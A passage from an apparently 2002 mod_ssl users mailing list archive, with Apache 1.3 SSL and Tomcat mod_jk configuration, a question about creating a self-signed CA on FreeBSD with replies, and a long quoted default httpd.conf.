#   o ssl-accurate-shutdown:
#     This forces an accurate shutdown when the connection is closed, i.e. a
#     SSL close notify alert is send and mod_ssl waits for the close notify
#     alert of the client. This is 100% SSL/TLS standard compliant, but in
#     practice often causes hanging connections with brain-dead browsers. Use
#     this only for browsers where you know that their SSL implementation
#     works correctly. 
#   Notice: Most problems of broken clients are also related to the HTTP
#   keep-alive facility, so you usually additionally want to disable
#   keep-alive for those clients, too. Use variable "nokeepalive" for this.
#   Similarly, one has to force some clients to use HTTP/1.0 to workaround
#   their broken HTTP/1.1 implementation. Use variables "downgrade-1.0" and
#   "force-response-1.0" for this.
SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0

#   Per-Server Logging:
#   The home of a custom SSL log file. Use this when you want a
#   compact non-error SSL logfile on a virtual host basis.
CustomLog /usr/local/apache1.3/logs/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"





# Tomcat mod_jk include
Include /usr/local/tomcat/conf/auto/mod_jk.conf
JkMount /*.xml ajp13

JkExtractSSL On
JkHTTPSIndicator HTTPS
JkSESSIONIndicator SSL_SESSION_ID
JkCIPHERIndicator SSL_CIPHER
JkCERTSIndicator SSL_CLIENT_CERT

# End of Tomcat mod_jk directives

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov 19 22:57:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA18990; Tue, 19 Nov 2002 22:56:25 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ms1kw.tx.shawcable.net id WAA18983; Tue, 19 Nov 2002 22:55:45 +0100 (MET)
Received: from 127.0.0.1 (localhost [127.0.0.1])
	by dummy.domain.name (Postfix) with SMTP id 8028035013D
	for ; Tue, 19 Nov 2002 15:54:33 -0600 (CST)
Received: by ms1kw.tx.shawcable.net (Postfix, from userid 48)
	id 5E81635013B; Tue, 19 Nov 2002 15:54:33 -0600 (CST)
From: "Ronnie Clark" 
To: modssl-users@modssl.org
Subject: FreeBSD 4.x and Apache+mod_ssl
X-Mailer: NeoMail 1.25
X-IPAddress: 63.89.83.220
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Message-Id: <20021119215433.5E81635013B@ms1kw.tx.shawcable.net>
Date: Tue, 19 Nov 2002 15:54:33 -0600 (CST)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ronnie Clark" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hello all, 

I am running FreeBSD 4.7 STABLE and just loaded mysql, 
Apache13+mod_ssl, and mod_php4 from the ports collection. I got php and 
SSL playing nice together, but I now have a website that is showing an 
invalid cert. How do I generate my own CA and new server cert signed by 
that CA in this format?

Thanks in advance,
Ron Clark


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov 19 23:16:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA19925; Tue, 19 Nov 2002 23:15:24 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from www.safenebraska.org id XAA19852; Tue, 19 Nov 2002 23:14:45 +0100 (MET)
Received: from linux (linux.safenebraska.org [192.168.1.100])
	by www.safenebraska.org (8.11.6/8.11.6/SuSE Linux 0.5) with ESMTP id gAJME4904462
	for ; Tue, 19 Nov 2002 16:14:04 -0600
Content-Type: text/plain;
  charset="iso-8859-1"
From: Marcel Erkens 
To: modssl-users@modssl.org
Subject: Re: FreeBSD 4.x and Apache+mod_ssl
Date: Tue, 19 Nov 2002 16:11:59 +0000
User-Agent: KMail/1.4.2
References: <20021119215433.5E81635013B@ms1kw.tx.shawcable.net>
In-Reply-To: <20021119215433.5E81635013B@ms1kw.tx.shawcable.net>
MIME-Version: 1.0
Message-Id: <200211191611.59763.merkens@safenebraska.org>
X-Virus-Scanned: by AMaViS-perl11-milter (http://amavis.org/)
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id XAA19877
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Marcel Erkens 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

from /usr/ports/www/apache13-modssl/ run:
make certificate TYPE=custom

and follow the prompts..  remember to copy them to wherever you're storing the 
certs apache uses and run make from that dir to update the links... 

That should do it :)
Hope this helps!
Marcel



On Tuesday 19 November 2002 21:54, Ronnie Clark wrote:
> Hello all,
>
> I am running FreeBSD 4.7 STABLE and just loaded mysql,
> Apache13+mod_ssl, and mod_php4 from the ports collection. I got php and
> SSL playing nice together, but I now have a website that is showing an
> invalid cert. How do I generate my own CA and new server cert signed by
> that CA in this format?
>
> Thanks in advance,
> Ron Clark
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

-- 
"They that give up essential liberty to obtain a little temporary safety... 
deserve neither safety nor liberty." - Benjamin Franklin(1759)
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 20 11:27:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA00841; Wed, 20 Nov 2002 11:25:53 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id LAA00780; Wed, 20 Nov 2002 11:24:42 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 714744CE779; Wed, 20 Nov 2002 10:23:54 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 8F7E42878A; Wed, 20 Nov 2002 10:18:10 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from dev.bsdnerds.org id XAA19408; Tue, 19 Nov 2002 23:09:42 +0100 (MET)
Received: from dev.bsdnerds.org (tr0n@localhost [127.0.0.1])
	by dev.bsdnerds.org (8.12.6/8.12.6) with ESMTP id gAJMAbHC009756
	for ; Tue, 19 Nov 2002 14:10:38 -0800 (PST)
	(envelope-from justin@bsdnerds.org)
Received: (from tr0n@localhost)
	by dev.bsdnerds.org (8.12.6/8.12.6/Submit) id gAJMAZI7009755;
	Tue, 19 Nov 2002 14:10:35 -0800 (PST)
X-Authentication-Warning: dev.bsdnerds.org: tr0n set sender to justin@bsdnerds.org using -f
Subject: Re: FreeBSD 4.x and Apache+mod_ssl
From: justin 
To: modssl-users@modssl.org
In-Reply-To: <20021119215433.5E81635013B@ms1kw.tx.shawcable.net>
References: <20021119215433.5E81635013B@ms1kw.tx.shawcable.net>
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.8 
Date: 19 Nov 2002 14:10:34 -0800
Message-Id: <1037743834.59387.37.camel@dev.bsdnerds.org>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: justin 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

here are some good certificate howtos hope they help you

http://www.ibiblio.org/pub/Linux/docs/HOWTO/other-formats/html_single/SSL-Certificates-HOWTO.html#AEN139

-- 
                                           _ __ ___ ____  ___ ___ ___
          Justin Bastedo                        _ __ ___ | _ ) __|   \
          justin@bsdnerds.org                       _ __ | _ \._ \ |) |
          FreeBSD: The Power To Serve                  _ |___/___/___/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 20 11:27:26 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA00868; Wed, 20 Nov 2002 11:26:14 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id LAA00774; Wed, 20 Nov 2002 11:24:41 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 2C2DD4CE764; Wed, 20 Nov 2002 10:23:54 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 23BB4286E1; Wed, 20 Nov 2002 10:17:50 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id WAA18959; Tue, 19 Nov 2002 22:54:13 +0100 (MET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id QAA05196;
	Tue, 19 Nov 2002 16:53:57 -0500
Date: Tue, 19 Nov 2002 16:53:57 -0500 (EST)
From: "R. DuFresne" 
To: Kent Perrier 
Cc: modssl-users@modssl.org
Subject: Re: Configuring a stand alone SSL enabled apache webserver
In-Reply-To: <1037733143.1128.131.camel@localhost.localdomain>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


As far as I'm aware, and others can correct me if I'm saying something
wrong here, the virtual server directives are optional.  The key would be
the server root for the ssl based pages to be served, tough enclosing a
SERVERROOT directive within the virtual server directives would benefit
you in seperation of pages being servered.  don't be overly confused by
the virtual server directives, they aren't just for VH hosting .

Thanks,

Ron DuFresne

On 19 Nov 2002, Kent Perrier wrote:

> Hi all,
> 
> I am looked in the archives and I have not found anything, so I am
> asking here.  I want to run a different web server on port 443 for SSL
> traffic (not a virtual server in the configuration file for the server
> on port 80).  Looking at log file, mod_ssl is loaded on start and it is
> listening on port 443, but the server does not support SSL encrypted
> traffic. I removed the SSLEngine On directive from the conf file since
> that only works in a virtual server.  How do I make this work?  I am
> running Apache 1.3.27, mod_ssl 2.8.12 0.9.6g
> 
> FYI, here is my httpd.conf
> 
> Thanks!
> 
> Kent
> 
> ##
> ## httpd.conf -- Apache HTTP server configuration file
> ##
> 
> #
> # Based upon the NCSA server configuration files originally by Rob McCool.
> #
> # This is the main Apache server configuration file.  It contains the
> # configuration directives that give the server its instructions.
> # See  for detailed information about
> # the directives.
> #
> # Do NOT simply read the instructions in here without understanding
> # what they do.  They're here only as hints or reminders.  If you are unsure
> # consult the online docs. You have been warned.  
> #
> # After this file is processed, the server will look for and process
> # /usr/local/apache1.3/conf/srm.conf and then /usr/local/apache1.3/conf/access.conf
> # unless you have overridden these with ResourceConfig and/or
> # AccessConfig directives here.
> #
> # The configuration directives are grouped into three basic sections:
> #  1. Directives that control the operation of the Apache server process as a
> #     whole (the 'global environment').
> #  2. Directives that define the parameters of the 'main' or 'default' server,
> #     which responds to requests that aren't handled by a virtual host.
> #     These directives also provide default values for the settings
> #     of all virtual hosts.
> #  3. Settings for virtual hosts, which allow Web requests to be sent to
> #     different IP addresses or hostnames and have them handled by the
> #     same Apache server process.
> #
> # Configuration and logfile names: If the filenames you specify for many
> # of the server's control files begin with "/" (or "drive:/" for Win32), the
> # server will use that explicit path.  If the filenames do *not* begin
> # with "/", the value of ServerRoot is prepended -- so "logs/foo.log"
> # with ServerRoot set to "/usr/local/apache" will be interpreted by the
> # server as "/usr/local/apache/logs/foo.log".
> #
> 
> ### Section 1: Global Environment
> #
> # The directives in this section affect the overall operation of Apache,
> # such as the number of concurrent requests it can handle or where it
> # can find its configuration files.
> #
> 
> #
> # ServerType is either inetd, or standalone.  Inetd mode is only supported on
> # Unix platforms.
> #
> ServerType standalone
> 
> #
> # ServerRoot: The top of the directory tree under which the server's
> # configuration, error, and log files are kept.
> #
> # NOTE!  If you intend to place this on an NFS (or otherwise network)
> # mounted filesystem then please read the LockFile documentation
> # (available at );
> # you will save yourself a lot of trouble.
> #
> ServerRoot "/usr/local/apache1.3"
> 
> #
> # The LockFile directive sets the path to the lockfile used when Apache
> # is compiled with either USE_FCNTL_SERIALIZED_ACCEPT or
> # USE_FLOCK_SERIALIZED_ACCEPT. This directive should normally be left at
> # its default value. The main reason for changing it is if the logs
> # directory is NFS mounted, since the lockfile MUST BE STORED ON A LOCAL
> # DISK. The PID of the main server process is automatically appended to
> # the filename. 
> #
> #LockFile /usr/local/apache1.3/logs/httpd.lock
> 
> #
> # PidFile: The file in which the server should record its process
> # identification number when it starts.
> #
> PidFile /usr/local/apache1.3/logs/httpd.pid
> 
> #
> # ScoreBoardFile: File used to store internal server process information.
> # Not all architectures require this.  But if yours does (you'll know because
> # this file will be  created when you run Apache) then you *must* ensure that
> # no two invocations of Apache share the same scoreboard file.
> #
> ScoreBoardFile /usr/local/apache1.3/logs/httpd.scoreboard
> 
> #
> # In the standard configuration, the server will process httpd.conf (this 
> # file, specified by the -f command line option), srm.conf, and access.conf 
> # in that order.  The latter two files are now distributed empty, as it is 
> # recommended that all directives be kept in a single file for simplicity.  
> # The commented-out values below are the built-in defaults.  You can have the 
> # server ignore these files altogether by using "/dev/null" (for Unix) or
> # "nul" (for Win32) for the arguments to the directives.
> #
> #ResourceConfig conf/srm.conf
> #AccessConfig conf/access.conf
> 
> #
> # Timeout: The number of seconds before receives and sends time out.
> #
> Timeout 300
> 
> #
> # KeepAlive: Whether or not to allow persistent connections (more than
> # one request per connection). Set to "Off" to deactivate.
> #
> KeepAlive On
> 
> #
> # MaxKeepAliveRequests: The maximum number of requests to allow
> # during a persistent connection. Set to 0 to allow an unlimited amount.
> # We recommend you leave this number high, for maximum performance.
> #
> MaxKeepAliveRequests 100
> 
> #
> # KeepAliveTimeout: Number of seconds to wait for the next request from the
> # same client on the same connection.
> #
> KeepAliveTimeout 15
> 
> #
> # Server-pool size regulation.  Rather than making you guess how many
> # server processes you need, Apache dynamically adapts to the load it
> # sees --- that is, it tries to maintain enough server processes to
> # handle the current load, plus a few spare servers to handle transient
> # load spikes (e.g., multiple simultaneous requests from a single
> # Netscape browser).
> #
> # It does this by periodically checking how many servers are waiting
> # for a request.  If there are fewer than MinSpareServers, it creates
> # a new spare.  If there are more than MaxSpareServers, some of the
> # spares die off.  The default values are probably OK for most sites.
> #
> MinSpareServers 5
> MaxSpareServers 10
> 
> #
> # Number of servers to start initially --- should be a reasonable ballpark
> # figure.
> #
> StartServers 5
> 
> #
> # Limit on total number of servers running, i.e., limit on the number
> # of clients who can simultaneously connect --- if this limit is ever
> # reached, clients will be LOCKED OUT, so it should NOT BE SET TOO LOW.
> # It is intended mainly as a brake to keep a runaway server from taking
> # the system with it as it spirals down...
> #
> MaxClients 150
> 
> #
> # MaxRequestsPerChild: the number of requests each child process is
> # allowed to process before the child dies.  The child will exit so
> # as to avoid problems after prolonged use when Apache (and maybe the
> # libraries it uses) leak memory or other resources.  On most systems, this
> # isn't really needed, but a few (such as Solaris) do have notable leaks
> # in the libraries. For these platforms, set to something like 10000
> # or so; a setting of 0 means unlimited.
> #
> # NOTE: This value does not include keepalive requests after the initial
> #       request per connection. For example, if a child process handles
> #       an initial request and 10 subsequent "keptalive" requests, it
> #       would only count as 1 request towards this limit.
> #
> MaxRequestsPerChild 0
> 
> #
> # Listen: Allows you to bind Apache to specific IP addresses and/or
> # ports, in addition to the default. See also the 
> # directive.
> #
> #Listen 3000
> #Listen 12.34.56.78:80
> 
> #
> # BindAddress: You can support virtual hosts with this option. This directive
> # is used to tell the server which IP address to listen to. It can either
> # contain "*", an IP address, or a fully qualified Internet domain name.
> # See also the  and Listen directives.
> #
> #BindAddress *
> 
> #
> # Dynamic Shared Object (DSO) Support
> #
> # To be able to use the functionality of a module which was built as a DSO you
> # have to place corresponding `LoadModule' lines at this location so the
> # directives contained in it are actually available _before_ they are used.
> # Please read the file http://httpd.apache.org/docs/dso.html for more
> # details about the DSO mechanism and run `httpd -l' for the list of already
> # built-in (statically linked and thus always available) modules in your httpd
> # binary.
> #
> # Note: The order in which modules are loaded is important.  Don't change
> # the order below without expert advice.
> #
> # Example:
> # LoadModule foo_module libexec/mod_foo.so
> 
> LoadModule ssl_module         libexec/libssl.so
> 
> 
> #  Reconstruction of the complete module list from all available modules
> #  (static and shared ones) to achieve correct module execution order.
> #  [WHENEVER YOU CHANGE THE LOADMODULE SECTION ABOVE UPDATE THIS, TOO]
> ClearModuleList
> AddModule mod_env.c
> AddModule mod_log_config.c
> AddModule mod_mime.c
> AddModule mod_negotiation.c
> AddModule mod_status.c
> AddModule mod_include.c
> AddModule mod_autoindex.c
> AddModule mod_dir.c
> AddModule mod_cgi.c
> AddModule mod_asis.c
> AddModule mod_imap.c
> AddModule mod_actions.c
> AddModule mod_userdir.c
> AddModule mod_alias.c
> AddModule mod_access.c
> AddModule mod_auth.c
> AddModule mod_so.c
> AddModule mod_setenvif.c
> 
> AddModule mod_ssl.c
> 
> 
> #
> # ExtendedStatus controls whether Apache will generate "full" status
> # information (ExtendedStatus On) or just basic information (ExtendedStatus
> # Off) when the "server-status" handler is called. The default is Off.
> #
> #ExtendedStatus On
> 
> ### Section 2: 'Main' server configuration
> #
> # The directives in this section set up the values used by the 'main'
> # server, which responds to any requests that aren't handled by a
> #  definition.  These values also provide defaults for
> # any  containers you may define later in the file.
> #
> # All of these directives may appear inside  containers,
> # in which case these default settings will be overridden for the
> # virtual host being defined.
> #
> 
> #
> # If your ServerType directive (set earlier in the 'Global Environment'
> # section) is set to "inetd", the next few directives don't have any
> # effect since their settings are defined by the inetd configuration.
> # Skip ahead to the ServerAdmin directive.
> #
> 
> #
> # Port: The port to which the standalone server listens. For
> # ports < 1023, you will need httpd to be run as root initially.
> #
> Port 443
> 
> ##
> ##  SSL Support
> ##
> ##  When we also provide SSL we have to listen to the 
> ##  standard HTTP port (see above) and to the HTTPS port
> ##
> 
> Listen 443
> 
> 
> #
> # If you wish httpd to run as a different user or group, you must run
> # httpd as root initially and it will switch.  
> #
> # User/Group: The name (or #number) of the user/group to run httpd as.
> #  . On SCO (ODT 3) use "User nouser" and "Group nogroup".
> #  . On HPUX you may not be able to use shared memory as nobody, and the
> #    suggested workaround is to create a user www and use that user.
> #  NOTE that some kernels refuse to setgid(Group) or semctl(IPC_SET)
> #  when the value of (unsigned)Group is above 60000; 
> #  don't use Group nobody on these systems!
> #
> User nobody
> Group nobody
> 
> #
> # ServerAdmin: Your address, where problems with the server should be
> # e-mailed.  This address appears on some server-generated pages, such
> # as error documents.
> #
> ServerAdmin kperrier@ev1.net
> 
> #
> # ServerName allows you to set a host name which is sent back to clients for
> # your server if it's different than the one the program would get (i.e., use
> # "www" instead of the host's real name).
> #
> # Note: You cannot just invent host names and hope they work. The name you 
> # define here must be a valid DNS name for your host. If you don't understand
> # this, ask your network administrator.
> # If your host doesn't have a registered DNS name, enter its IP address here.
> # You will have to access it by its address (e.g., http://123.45.67.89/)
> # anyway, and this will make redirections work in a sensible way.
> #
> # 127.0.0.1 is the TCP/IP local loop-back address, often named localhost. Your 
> # machine always knows itself by this address. If you use Apache strictly for 
> # local testing and development, you may use 127.0.0.1 as the server name.
> #
> ServerName www.bestofhealthamerica.com
> 
> #
> # DocumentRoot: The directory out of which you will serve your
> # documents. By default, all requests are taken from this directory, but
> # symbolic links and aliases may be used to point to other locations.
> #
> DocumentRoot "/usr/local/apache1.3/htdocs"
> 
> #
> # Each directory to which Apache has access, can be configured with respect
> # to which services and features are allowed and/or disabled in that
> # directory (and its subdirectories). 
> #
> # First, we configure the "default" to be a very restrictive set of 
> # permissions.  
> #
> 
>     Options FollowSymLinks
>     AllowOverride None
> 
> 
> #
> # Note that from this point forward you must specifically allow
> # particular features to be enabled - so if something's not working as
> # you might expect, make sure that you have specifically enabled it
> # below.
> #
> 
> #
> # This should be changed to whatever you set DocumentRoot to.
> #
> 
> 
> #
> # This may also be "None", "All", or any combination of "Indexes",
> # "Includes", "FollowSymLinks", "ExecCGI", or "MultiViews".
> #
> # Note that "MultiViews" must be named *explicitly* --- "Options All"
> # doesn't give it to you.
> #
>     Options Indexes FollowSymLinks MultiViews
> 
> #
> # This controls which options the .htaccess files in directories can
> # override. Can also be "All", or any combination of "Options", "FileInfo", 
> # "AuthConfig", and "Limit"
> #
>     AllowOverride None
> 
> #
> # Controls who can get stuff from this server.
> #
>     Order allow,deny
>     Allow from all
> 
> 
> #
> # UserDir: The name of the directory which is appended onto a user's home
> # directory if a ~user request is received.
> #
> 
>     UserDir public_html
> 
> 
> #
> # DirectoryIndex: Name of the file or files to use as a pre-written HTML
> # directory index.  Separate multiple entries with spaces.
> #
> 
>     DirectoryIndex index.html
> 
> 
> #
> # AccessFileName: The name of the file to look for in each directory
> # for access control information.
> #
> AccessFileName .htaccess
> 
> #
> # The following lines prevent .htaccess files from being viewed by
> # Web clients.  Since .htaccess files often contain authorization
> # information, access is disallowed for security reasons.  Comment
> # these lines out if you want Web visitors to see the contents of
> # .htaccess files.  If you change the AccessFileName directive above,
> # be sure to make the corresponding changes here.
> #
> # Also, folks tend to use names such as .htpasswd for password
> # files, so this will protect those as well.
> #
> 
>     Order allow,deny
>     Deny from all
>     Satisfy All
> 
> 
> #
> # CacheNegotiatedDocs: By default, Apache sends "Pragma: no-cache" with each
> # document that was negotiated on the basis of content. This asks proxy
> # servers not to cache the document. Uncommenting the following line disables
> # this behavior, and proxies will be allowed to cache the documents.
> #
> #CacheNegotiatedDocs
> 
> #
> # UseCanonicalName:  (new for 1.3)  With this setting turned on, whenever
> # Apache needs to construct a self-referencing URL (a URL that refers back
> # to the server the response is coming from) it will use ServerName and
> # Port to form a "canonical" name.  With this setting off, Apache will
> # use the hostname:port that the client supplied, when possible.  This
> # also affects SERVER_NAME and SERVER_PORT in CGI scripts.
> #
> UseCanonicalName On
> 
> #
> # TypesConfig describes where the mime.types file (or equivalent) is
> # to be found.
> #
> 
>     TypesConfig /usr/local/apache1.3/conf/mime.types
> 
> 
> #
> # DefaultType is the default MIME type the server will use for a document
> # if it cannot otherwise determine one, such as from filename extensions.
> # If your server contains mostly text or HTML documents, "text/plain" is
> # a good value.  If most of your content is binary, such as applications
> # or images, you may want to use "application/octet-stream" instead to
> # keep browsers from trying to display binary files as though they are
> # text.
> #
> DefaultType text/plain
> 
> #
> # The mod_mime_magic module allows the server to use various hints from the
> # contents of the file itself to determine its type.  The MIMEMagicFile
> # directive tells the module where the hint definitions are located.
> # mod_mime_magic is not part of the default server (you have to add
> # it yourself with a LoadModule [see the DSO paragraph in the 'Global
> # Environment' section], or recompile the server and include mod_mime_magic
> # as part of the configuration), so it's enclosed in an  container.
> # This means that the MIMEMagicFile directive will only be processed if the
> # module is part of the server.
> #
> 
>     MIMEMagicFile /usr/local/apache1.3/conf/magic
> 
> 
> #
> # HostnameLookups: Log the names of clients or just their IP addresses
> # e.g., www.apache.org (on) or 204.62.129.132 (off).
> # The default is off because it'd be overall better for the net if people
> # had to knowingly turn this feature on, since enabling it means that
> # each client request will result in AT LEAST one lookup request to the
> # nameserver.
> #
> HostnameLookups Off
> 
> #
> # ErrorLog: The location of the error log file.
> # If you do not specify an ErrorLog directive within a 
> # container, error messages relating to that virtual host will be
> # logged here.  If you *do* define an error logfile for a 
> # container, that host's errors will be logged there and not here.
> #
> ErrorLog /usr/local/apache1.3/logs/error_log
> 
> #
> # LogLevel: Control the number of messages logged to the error_log.
> # Possible values include: debug, info, notice, warn, error, crit,
> # alert, emerg.
> #
> LogLevel warn
> 
> #
> # The following directives define some format nicknames for use with
> # a CustomLog directive (see below).
> #
> LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
> LogFormat "%h %l %u %t \"%r\" %>s %b" common
> LogFormat "%{Referer}i -> %U" referer
> LogFormat "%{User-agent}i" agent
> 
> #
> # The location and format of the access logfile (Common Logfile Format).
> # If you do not define any access logfiles within a 
> # container, they will be logged here.  Contrariwise, if you *do*
> # define per- access logfiles, transactions will be
> # logged therein and *not* in this file.
> #
> CustomLog /usr/local/apache1.3/logs/access_log common
> 
> #
> # If you would like to have agent and referer logfiles, uncomment the
> # following directives.
> #
> #CustomLog /usr/local/apache1.3/logs/referer_log referer
> #CustomLog /usr/local/apache1.3/logs/agent_log agent
> 
> #
> # If you prefer a single logfile with access, agent, and referer information
> # (Combined Logfile Format) you can use the following directive.
> #
> #CustomLog /usr/local/apache1.3/logs/access_log combined
> 
> #
> # Optionally add a line containing the server version and virtual host
> # name to server-generated pages (error documents, FTP directory listings,
> # mod_status and mod_info output etc., but not CGI generated documents).
> # Set to "EMail" to also include a mailto: link to the ServerAdmin.
> # Set to one of:  On | Off | EMail
> #
> ServerSignature On
> 
> #
> # Aliases: Add here as many aliases as you need (with no limit). The format is 
> # Alias fakename realname
> #
> 
> 
>     #
>     # Note that if you include a trailing / on fakename then the server will
>     # require it to be present in the URL.  So "/icons" isn't aliased in this
>     # example, only "/icons/".  If the fakename is slash-terminated, then the 
>     # realname must also be slash terminated, and if the fakename omits the 
>     # trailing slash, the realname must also omit it.
>     #
>     Alias /icons/ "/usr/local/apache1.3/icons/"
> 
>     
>         Options Indexes MultiViews
>         AllowOverride None
>         Order allow,deny
>         Allow from all
>     
> 
>     # This Alias will project the on-line documentation tree under /manual/
>     # even if you change the DocumentRoot. Comment it if you don't want to 
>     # provide access to the on-line documentation.
>     #
>     Alias /manual/ "/usr/local/apache1.3/htdocs/manual/"
> 
>     
>         Options Indexes FollowSymlinks MultiViews
>         AllowOverride None
>         Order allow,deny
>         Allow from all
>     
> 
>     #
>     # ScriptAlias: This controls which directories contain server scripts.
>     # ScriptAliases are essentially the same as Aliases, except that
>     # documents in the realname directory are treated as applications and
>     # run by the server when requested rather than as documents sent to the client.
>     # The same rules about trailing "/" apply to ScriptAlias directives as to
>     # Alias.
>     #
>     ScriptAlias /cgi-bin/ "/usr/local/apache1.3/cgi-bin/"
> 
>     #
>     # "/usr/local/apache1.3/cgi-bin" should be changed to whatever your ScriptAliased
>     # CGI directory exists, if you have that configured.
>     #
>     
>         AllowOverride None
>         Options None
>         Order allow,deny
>         Allow from all
>     
> 
> 
> # End of aliases.
> 
> #
> # Redirect allows you to tell clients about documents which used to exist in
> # your server's namespace, but do not anymore. This allows you to tell the
> # clients where to look for the relocated document.
> # Format: Redirect old-URI new-URL
> #
> 
> #
> # Directives controlling the display of server-generated directory listings.
> #
> 
> 
>     #
>     # FancyIndexing is whether you want fancy directory indexing or standard
>     #
>     IndexOptions FancyIndexing
> 
>     #
>     # AddIcon* directives tell the server which icon to show for different
>     # files or filename extensions.  These are only displayed for
>     # FancyIndexed directories.
>     #
>     AddIconByEncoding (CMP,/icons/compressed.gif) x-compress x-gzip
> 
>     AddIconByType (TXT,/icons/text.gif) text/*
>     AddIconByType (IMG,/icons/image2.gif) image/*
>     AddIconByType (SND,/icons/sound2.gif) audio/*
>     AddIconByType (VID,/icons/movie.gif) video/*
> 
>     AddIcon /icons/binary.gif .bin .exe
>     AddIcon /icons/binhex.gif .hqx
>     AddIcon /icons/tar.gif .tar
>     AddIcon /icons/world2.gif .wrl .wrl.gz .vrml .vrm .iv
>     AddIcon /icons/compressed.gif .Z .z .tgz .gz .zip
>     AddIcon /icons/a.gif .ps .ai .eps
>     AddIcon /icons/layout.gif .html .shtml .htm .pdf
>     AddIcon /icons/text.gif .txt
>     AddIcon /icons/c.gif .c
>     AddIcon /icons/p.gif .pl .py
>     AddIcon /icons/f.gif .for
>     AddIcon /icons/dvi.gif .dvi
>     AddIcon /icons/uuencoded.gif .uu
>     AddIcon /icons/script.gif .conf .sh .shar .csh .ksh .tcl
>     AddIcon /icons/tex.gif .tex
>     AddIcon /icons/bomb.gif core
> 
>     AddIcon /icons/back.gif ..
>     AddIcon /icons/hand.right.gif README
>     AddIcon /icons/folder.gif ^^DIRECTORY^^
>     AddIcon /icons/blank.gif ^^BLANKICON^^
> 
>     #
>     # DefaultIcon is which icon to show for files which do not have an icon
>     # explicitly set.
>     #
>     DefaultIcon /icons/unknown.gif
> 
>     #
>     # AddDescription allows you to place a short description after a file in
>     # server-generated indexes.  These are only displayed for FancyIndexed
>     # directories.
>     # Format: AddDescription "description" filename
>     #
>     #AddDescription "GZIP compressed document" .gz
>     #AddDescription "tar archive" .tar
>     #AddDescription "GZIP compressed tar archive" .tgz
> 
>     #
>     # ReadmeName is the name of the README file the server will look for by
>     # default, and append to directory listings.
>     #
>     # HeaderName is the name of a file which should be prepended to
>     # directory indexes. 
>     #
>     # If MultiViews are amongst the Options in effect, the server will
>     # first look for name.html and include it if found.  If name.html
>     # doesn't exist, the server will then look for name.txt and include
>     # it as plaintext if found.
>     #
>     ReadmeName README
>     HeaderName HEADER
> 
>     #
>     # IndexIgnore is a set of filenames which directory indexing should ignore
>     # and not include in the listing.  Shell-style wildcarding is permitted.
>     #
>     IndexIgnore .??* *~ *# HEADER* README* RCS CVS *,v *,t
> 
> 
> # End of indexing directives.
> 
> #
> # Document types.
> #
> 
> 
>     #
>     # AddEncoding allows you to have certain browsers (Mosaic/X 2.1+) uncompress
>     # information on the fly. Note: Not all browsers support this.
